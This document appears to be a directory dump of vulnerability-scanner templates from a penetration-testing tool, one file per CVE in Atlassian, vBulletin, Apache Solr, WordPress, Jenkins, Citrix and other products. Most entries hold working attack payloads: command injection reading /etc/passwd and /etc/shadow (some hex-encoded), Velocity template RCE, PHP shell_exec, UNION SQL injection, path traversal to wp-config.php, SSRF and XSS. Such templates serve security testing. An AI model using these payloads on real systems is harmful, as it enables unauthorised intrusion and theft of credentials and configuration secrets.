/templates/active/CVE-2019-11580_-_Atlassian_Crowd_Data_Center_Unauthenticated_RCE.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-11580 - Atlassian Crowd Data Center Unauthenticated RCE' 3 | URI='/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow' 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-11581_-_Jira_Template_Injection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-11581 - Jira Template Injection' 3 | URI='/secure/ContactAdministrators!default.jspa' 4 | METHOD='GET' 5 | MATCH='Contact Site Administrators' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-1653 - Cisco RV320 RV326 Configuration Disclosure' 3 | URI="/cgi-bin/config.exp" 4 | METHOD='GET' 5 | MATCH="sysconfig" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-16662_-_rConfig_3.9.2_Remote_Code_Execution.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-16662 - rConfig 3.9.2 Remote Code Execution' 3 | URI='/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23' 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS='--user-agent "" -s -L --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution' 3 | URI='/' 4 | METHOD='POST' 5 | MATCH='1787569' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS='-d "routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+shell_exec%28%27echo+$((1%2B1787568))%27%29%3B+exit%3B" -H "Content-Type: application/x-www-form-urlencoded" --user-agent "" -s -L --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution_Bypass.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution Bypass' 3 | URI='/ajax/render/widget_tabbedcontainer_tab_panel' 4 | METHOD='POST' 5 | MATCH='PHP\ Version' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS='-d "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();" -H "Content-Type: application/x-www-form-urlencoded" --user-agent "" -s -L --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' 10 | -------------------------------------------------------------------------------- /templates/active/CVE-2019-17558_-_Apache_Solr_RCE.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-17558 - Apache Solr RCE' 3 | URI='/solr/dovecot/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end' 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-19719_Tableau_Server_DOM_XSS.py: -------------------------------------------------------------------------------- 1 | # Import any WebDriver class that you would usually import from 2 | # selenium.webdriver from the seleniumrequests module 3 | import sys 4 | from seleniumrequests import Firefox 5 | 6 | url = sys.argv[1] 7 | # Simple usage with built-in WebDrivers: 8 | webdriver = Firefox() 9 | response = webdriver.request('GET', '%s/en/embeddedAuthRedirect.html?auth=javascript:document.write(1+1336)' % url) 10 | if '1337' in response.text: 11 | print("Vulnerable!") 12 | print(response.text) 13 | webdriver.quit() 14 | SECONDARY_COMMANDS='' -------------------------------------------------------------------------------- /templates/active/CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-19781 - Citrix ADC Directory Traversal' 3 | URI='/vpn/../vpns/cfg/smb.conf' 4 | METHOD='GET' 5 | MATCH='\[global\]' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-19908 - phpMyChat-Plus XSS' 3 | URI="/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E" 4 | METHOD='GET' 5 | MATCH="<script>alert\(1337\)<\/script>" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-5418_-_Rail_File_Content_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-5418 - File Content Disclosure on Rails' 3 | URI="/../../../../../../../../etc/passwd\{\{" 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-6340_-_Drupal8_REST_RCE_SA-CORE-2019-003.disabled: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-6340 - Drupal8 REST RCE SA-CORE-2019-003' 3 | URI='/node/1?_format=hal_json' 4 | METHOD='GET' 5 | MATCH='INVALID_VALUE\ does\ not\ correspond' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS='--user-agent "" -s -L --insecure -H "Content-Type: application/hal+json" --data \'{ "_links": { "type": { "href": "http://192.168.56.101/drupal-8.6.9/rest/type/node/INVALID_VALUE" } }, "type": { "target_id": "article" }, "title": { "value": "My Article" }, "body": { "value": "some body content aaa bbb ccc" }}\' ' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-7192_-_QNAP_Pre-Auth_Root_RCE.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-7192 - QNAP Pre-Auth Root RCE' 3 | URI='/photo/p/api/video.php' 4 | METHOD='GET' 5 | MATCH="\[\ 401\ Unauthorized\ \]" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-8442_-_Jira_Webroot_Directory_Traversal_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8442 - Jira Webroot Directory Traversal 1' 3 | URI="/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" 4 | METHOD='GET' 5 | MATCH='artifactId' 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS='-L --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-8442_-_Jira_Webroot_Directory_Traversal_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8442 - Jira Webroot Directory Traversal 2' 3 | URI="/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties" 4 | METHOD='GET' 5 | MATCH='artifactId' 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS='-L --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-8451_Jira_SSRF_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8451 Jira SSRF 1' 3 | URI="/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com" 4 | METHOD='GET' 5 | MATCH='<title>Google' 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-8451_Jira_SSRF_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8451 Jira SSRF 2' 3 | URI="/jira/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com" 4 | METHOD='GET' 5 | MATCH='Google' 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-8451_Jira_SSRF_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8451 Jira SSRF 3' 3 | URI="/wiki/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com" 4 | METHOD='GET' 5 | MATCH='Google' 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-8451_Jira_SSRF_4.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8451 Jira SSRF 4' 3 | URI="/confluence/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com" 4 | METHOD='GET' 5 | MATCH='Google' 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-8903_-_Totaljs_Unathenticated_Directory_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8903 - Totaljs - Unathenticated Directory Traversal' 3 | URI="/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html" 4 | METHOD='GET' 5 | MATCH="apache2\.conf" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2019-8982_-_Wavemaker_Studio_6.6_LFI_SSRF.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-8982 - Wavemaker Studio 6.6 LFI/SSRF' 3 | URI="/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd" 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-0618_-_Remote_Code_Execution_SQL_Server_Reporting_Services.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-0618 - Remote Code Execution SQL Server Reporting Services' 3 | URI="/ReportServer/Pages/ReportViewer.aspx" 4 | METHOD='GET' 5 | MATCH="view\ report" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s --insecure -I " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-10204_-_Sonatype_Nexus_Repository_RCE.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-10204 - Sonatype Nexus Repository RCE' 3 | URI="/extdirect" 4 | METHOD='POST' 5 | MATCH="1787569" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS='--user-agent '' -s --insecure -L --data \'{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}\' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-1147_-_Remote_Code_Execution_in_Microsoft_SharePoint_Server.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-1147 - Remote Code Execution in Microsoft SharePoint Server' 3 | URI="/_layouts/15/listform.aspx?PageType=1&ListId=%7B13371337-1337-1337-1337-133713371337%7D" 4 | METHOD='GET' 5 | MATCH="List\ does\ not\ exist|It\ may\ have\ been\ deleted\ by\ another\ user" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s --insecure -I " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-11530_-_Wordpress_Chop_Slider_3_Plugin_SQL_Injection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-11530 - Wordpress Chop Slider 3 Plugin SQL Injection' 3 | URI='/wp-content/plugins/chopslider/get_script/index.php?id=1111111' 4 | METHOD='GET' 5 | MATCH='chopslider_id_1111111' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal' 3 | URI="/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" 4 | METHOD='GET' 5 | MATCH="root\:x" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 2' 3 | URI="/wordpress/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" 4 | METHOD='GET' 5 | MATCH="root\:x" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 3' 3 | URI="/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php" 4 | METHOD='GET' 5 | MATCH="DB_NAME|DB_USER|COLLATE" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_4.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 4' 3 | URI="/wordpress/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php" 4 | METHOD='GET' 5 | MATCH="DB_NAME|DB_USER|COLLATE" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-12271_-_Sophos_XG_Firewall_Pre-Auth_SQL_Injection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-12271 - Sophos XG Firewall Pre-Auth SQL Injection' 3 | URI='/userportal/webpages/myaccount/login.jsp' 4 | METHOD='GET' 5 | MATCH='loginstylesheet' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 1' 3 | URI="/ajax/api/content_infraction/getIndexableContent" 4 | METHOD='POST' 5 | MATCH="6162636D31|database\ error" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,HEX('abcm1'),8,7,6,5,4,3,2,1+from+user+where+userid=1--\" " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 2' 3 | URI="/vb5/ajax/api/content_infraction/getIndexableContent" 4 | METHOD='POST' 5 | MATCH="6162636D31|database\ error" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,HEX('abcm1'),8,7,6,5,4,3,2,1+from+user+where+userid=1--\" " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 3' 3 | URI="/vb5/ajax/api/content_infraction/getIndexableContent" 4 | METHOD='POST' 5 | MATCH="vbulletinrce" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\" " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-13167_-_Netsweeper_WebAdmin_Python_Code_Injection_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-13167 - Netsweeper WebAdmin unixlogin.php Python Code Injection 1' 3 | URI="/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5" 4 | METHOD='GET' 5 | MATCH="nonexistent" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS=' --user-agent '' -s -L --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-13167_-_Netsweeper_WebAdmin_Python_Code_Injection_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-13167 - Netsweeper WebAdmin unixlogin.php Python Code Injection 2' 3 | URI="/webadmin/out" 4 | METHOD='GET' 5 | MATCH="nonexistent" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS=' --user-agent '' -s -L --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-14181_-_User_Enumeration_Via_Insecure_Jira_Endpoint.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-14181 - User Enumeration Via Insecure Jira Endpoint' 3 | URI="/secure/ViewUserHover.jspa?username=randomUser" 4 | METHOD='GET' 5 | MATCH="User\ does\ not\ exist" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s --insecure -L " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-14815_-_Oracle_Business_Intelligence_Enterprise_DOM_XSS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-14815 - Oracle Business Intelligence Enterprise DOM XSS' 3 | URI='/bi-security-login/login.jsp?msi=false&redirect=">' 4 | METHOD='GET' 5 | MATCH="Oracle\ Business\ Intelligence" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-15129_-_Open_Redirect_In_Traefik.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-15129 - Open Redirect In Traefik' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="Found" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'X-Forwarded-Prefix: https://google.com'" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-15920_-_Mida_eFramework_Unauthenticated_RCE.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-15920 - Mida eFramework Unauthenticated RCE' 3 | URI='/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING' 4 | METHOD='GET' 5 | MATCH='root\:' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-17519_-_Apache_Flink_Path_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-17519 - Apache Flink Path Traversal' 3 | URI="/jobmanager/logs/..%252f..%252f..%252f......%252f..%252fetc%252fpasswd" 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-2034_-_PAN-OS_GlobalProtect_OS_Command_Injection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-2034 - PAN-OS GlobalProtect OS Command Injection' 3 | URI='/global-protect/login.esp' 4 | METHOD='GET' 5 | MATCH='ETag|Last-Modified' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='' -------------------------------------------------------------------------------- /templates/active/CVE-2020-2096_-_Jenkins_Gitlab_Hook_XSS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-2096 - Jenkins Gitlab Hook XSS' 3 | URI="/gitlab/build_now%3Csvg/onload=alert(1337)%3E" 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 1' 3 | URI="/git/build_now/a'\">%3Csvg/onload=alert(1337)%3E" 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 2' 3 | URI="/jenkins/git/build_now/a'\">%3Csvg/onload=alert(1337)%3E" 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 3' 3 | URI="/gitlab/build_now/a'\">%3Csvg/onload=alert(1337)%3E" 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_4.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 4' 3 | URI="/jenkins/gitlab/build_now/a'\">%3Csvg/onload=alert(1337)%3E" 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-2140_-_Jenkin_AuditTrailPlugin_XSS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-2140 - Jenkin AuditTrailPlugin XSS' 3 | URI="/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Csvg/onload=alert(1337)%3E" 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s --insecure -L " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-24223_-_Mara_CMS_7.5_Reflective_XSS.sh: 